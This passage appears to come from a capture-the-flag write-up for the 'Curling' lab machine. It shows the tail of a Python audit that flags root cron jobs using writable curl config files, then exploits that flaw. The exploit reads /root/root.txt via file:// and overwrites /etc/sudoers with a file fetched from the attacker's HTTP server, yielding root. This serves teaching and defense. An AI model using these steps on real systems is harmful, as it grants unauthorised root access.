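    """Paths a command reads as instructions (curl -K/--config), not as mere data."""
    m = re.match(r"^/bin/sh\s+-c\s+(.*)$", cmdline)  # unwrap the way pspy shows cron jobs
    script = m.group(1) if m else cmdline
    paths: List[str] = []
    for cmd in re.split(r"\s*(?:;|&&|\|\||\|)\s*", script):
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue
        if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
            continue
        for i, tok in enumerate(argv[:-1]):
            if tok in ("-K", "--config"):
                paths.append(argv[i + 1])
    return paths


def audit(events: List[str], files: Dict[str, Tuple[str, str, int]]) -> List[Tuple[str, str]]:
    """Flag root-run commands whose curl config file a non-root user can edit."""
    findings: List[Tuple[str, str]] = []
    for line in events:
        m = PSPY_RE.match(line)
        if not m or int(m.group(1)) != 0:  # only commands running as root matter here
            continue
        cmd = m.group(2).strip()
        for path in config_inputs(cmd):
            meta = files.get(path)
            if meta and writable_by_nonroot(*meta):
                findings.append((path, cmd))
    return findings


if __name__ == "__main__":
    for path, cmd in audit(EVENTS, FILES):
        print(f"[!] root runs '{cmd}' with config {path} writable by non-root users")
```

The fix the audit points at is the same either way: keep the config file root-owned and not group/world-writable (like the hypothetical /etc/report-job.cfg entry), or run the job as the unprivileged user instead of root.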

floris@curling:~/admin-area$ echo "url = \"file:///root/root.txt\"" > input
floris@curling:~/admin-area$ cat input

url = "file:///root/root.txt"

floris@curling:~/admin-area$ ls -la

total 28
drwxr-x--- 2 root   floris  4096 May 22  2018 .
drwxr-xr-x 6 floris floris  4096 Nov 30 09:34 ..
-rw-rw---- 1 root   floris    30 Nov 30 10:25 input
-rw-rw---- 1 root   floris 14236 Nov 30 10:25 report

floris@curling:~/admin-area$ ls -la

total 16
drwxr-x--- 2 root   floris 4096 May 22  2018 .
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 ..
-rw-rw---- 1 root   floris   30 Nov 30 10:25 input
-rw-rw---- 1 root   floris   33 Nov 30 10:26 report

floris@curling:~/admin-area$ cat report

82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX

What if we want a shell?

$ cat sudoers.txt

root    ALL=(ALL:ALL) ALL
floris  ALL=(ALL:ALL) ALL

$ python3 -m http.server 8080

Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.150 - - [30/Nov/2020 11:58:01] "GET /sudoers.txt HTTP/1.1" 200 -

floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.14:8080/sudoers.txt"\noutput = "/etc/sudoers"' > input

The -e option of echo enables interpretation of backslash escapes, so the \n becomes a newline between the two lines.

floris@curling:~/admin-area$ cat input

url = "http://10.10.14.14:8080/sudoers.txt"
output = "/etc/sudoers"

floris@curling:~/admin-area$ sudo su root

[sudo] password for floris: 
root@curling:/home/floris/admin-area#

root@curling:/home/floris/admin-area# whoami

root

root@curling:/home/floris/admin-area# cat /root/root.txt

82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX
